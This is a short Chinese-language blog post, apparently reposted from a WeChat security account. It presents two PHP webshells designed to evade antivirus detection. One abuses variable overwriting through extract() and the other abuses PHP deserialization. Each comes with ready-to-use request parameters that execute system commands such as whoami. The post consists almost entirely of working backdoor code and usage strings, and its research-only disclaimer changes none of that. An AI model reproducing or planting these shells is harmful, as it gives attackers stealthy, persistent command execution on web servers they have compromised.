超级耐用Webshell免杀思路

admin 2023年6月5日22:44:43评论15 views字数 680阅读2分16秒阅读模式

变量覆盖型:

<?phpif($_GET['exec']==="0"){exit;}else if($_GET['exec']==="1"){call_user_func(function() {$cmd = function($params){extract($params);$a($b);};$cmd($_REQUEST);});}

利用:

exec=1&a=system&b=whoami

反序列化型:

<?phpclass test{public $id = array('a'=>'1','b'=>'2');function __wakeup(){echo $this;}
function __toString(){call_user_func(function() {$cmd = function($params){extract($params);$a($b);};$cmd($this->id);});}};if($_GET['exec']==="0"){exit;}else if($_GET['exec']==="1"){$test1 = $_GET['string'];$test2 = unserialize($test1);}

利用:

exec=1&string=O:4:"test":1:{s:2:"id";a:2:{s:1:"a";s:6:"system";s:1:"b";s:6:"whoami";}}


可参考:

https://mp.weixin.qq.com/s/WQaSVZQ_jeH9RiTvRwd16A

原文始发于微信公众号(浪飒sec):超级耐用Webshell免杀思路

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月5日22:44:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   超级耐用Webshell免杀思路https://cn-sec.com/archives/1707825.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息